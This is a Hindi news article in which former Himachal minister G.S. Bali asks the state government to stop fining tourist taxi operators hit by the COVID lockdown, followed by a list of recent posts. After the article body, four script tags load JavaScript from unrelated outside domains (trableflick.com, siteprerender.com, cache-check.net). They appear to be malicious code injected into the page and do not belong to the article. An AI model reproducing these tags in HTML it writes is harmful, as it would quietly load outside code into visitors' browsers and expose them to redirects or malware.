कोरोना और लॉकडाउन की मार, सरकार न करे टैक्सी चालकों के चालानः बाली

<p>हिमाचल प्रदेश में हजारों लोगों का रोजगार पर्यटकों के चलते चलता है। लेकिन कोरोना महामारी में यह कारोबार पूरी तरह से बंद पड़ा है यह कहना है पूर्व मंत्री जीएस बाली का। उन्होंने अपने सोशल मीडिया पेज के माध्यम से सरकार से कहा कि हिमाचल प्रदेश की अर्थव्यव्यस्था में पर्यटन क्षेत्र का अहम योगदान है। साथ ही यह क्षेत्र होटल से लेकर ट्रांसपोर्ट तक जुड़े हजारों लोगों की रोजी रोटी का साधन है। हमारे प्रदेश के कई लोग टैक्सी और इस तरह की गाड़ियां लोन में लेकर उनसे कमाकर अपने परिवार की आजीविका चलाते हैं। पर्यटन क्षेत्र पर कोरोना और लॉकडाउन की सबसे अधिक मार पड़ी है।</p>

<p>उन्होंने कहा कि हिमाचल सरकार जहां खुद लोन लेकर गुजारा कर रही है। वहीं, मंदी से जूझ रहे टैक्सी ऑपरेटरों को टैक्स न भर पाने के कारण सड़कों पर चालान करवा रही है। सरकार को समझना चाहिए कि लोन और टैक्स का बोझ ये ऑपरेटर अब तभी उठा पाएंगे जब हालात कुछ सुधरेंगे। इन लोगों को तब तक मोहलत दी जाए। अनावश्यक रूप से इस सेक्टर से जीविका चला रहे लोगों को तंग न किया जाए। यह तबका आजतक राजस्व का मुख्य हिस्सा रह चुका है और आज इन्हें चंद महीनों तक सरकार के सहयोग की जरूरत है।</p>

<p>बाली ने कहा कि इनके ऊपर आज गाड़ी की क़िस्त भरने और परिवार के भरण पोषण की मंदी के बीच डबल जिम्मेदारी है। इनकी मजबूरी को समझा जाये और बेवजह इनपर अभी आर्थिक बोझ और जुर्माने न किये जायें। सरकार हालात सामान्य होने का इंतजार करे। यह तबका ईमानदारी से अपना टैक्स भरता आया है और आगे भी भरेगा। अभी इनसे सहयोग किया जाए।</p>

<p><img src=”/media/gallery/images/image(1690).png” style=”height:110px; width:900px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1607143757638″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

शिमला में छुट्टियां बीताकर सोनिया और राहुल लौटे, अब दिल्ली की राह

Shimla: हिमाचल की राजधानी शिमला के मशोबरा में छुट्टियां बीताकर आज सुबह सोनिया गांधी और…

30 mins ago

सितम्बर 23 का राशिफल, क्या कहती हैं आपकी राशि?

आज का राशिफल 23 सितम्बर 2024 , सोमवार मेष🐐 (चू, चे, चो, ला, ली, लू,…

53 mins ago

“JOA IT पदों पर चयनित उम्मीदवारों की सूची जारी, इतने को मिली नियुक्ति”

  Shimla: सामाजिक न्याय एवं अधिकारिता विभाग ने राज्य चयन आयोग की सिफारिशों के आधार…

15 hours ago

अतिक्रमण एक रात का नहीं, सुक्खू सरकार से पहले हुआ अवैध निर्माण: कुलदीप

  Shimla : हिमाचल प्रदेश में स्ट्रीट वेंडर्स को लेकर विधानसभा की ओर से कमेटी…

15 hours ago

मुख्यमंत्री के निर्देश पर हमीरपुर में ‘कायाकल्प’ अभियान से बदल रही है शहर की तस्वीर

  Hamirpur: मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू के गृह जिले के मुख्यालय हमीरपुर शहर की…

16 hours ago

राज्य के स्वास्थ्य ढांचे को मजबूत करने के लिए ठोस कदम उठा रही है सरकार: बाली

  टांडा मेडिकल कालेज भी स्वास्थ्य क्षेत्र में निरंतर नए आयाम कर रहा स्थापित विश्व…

16 hours ago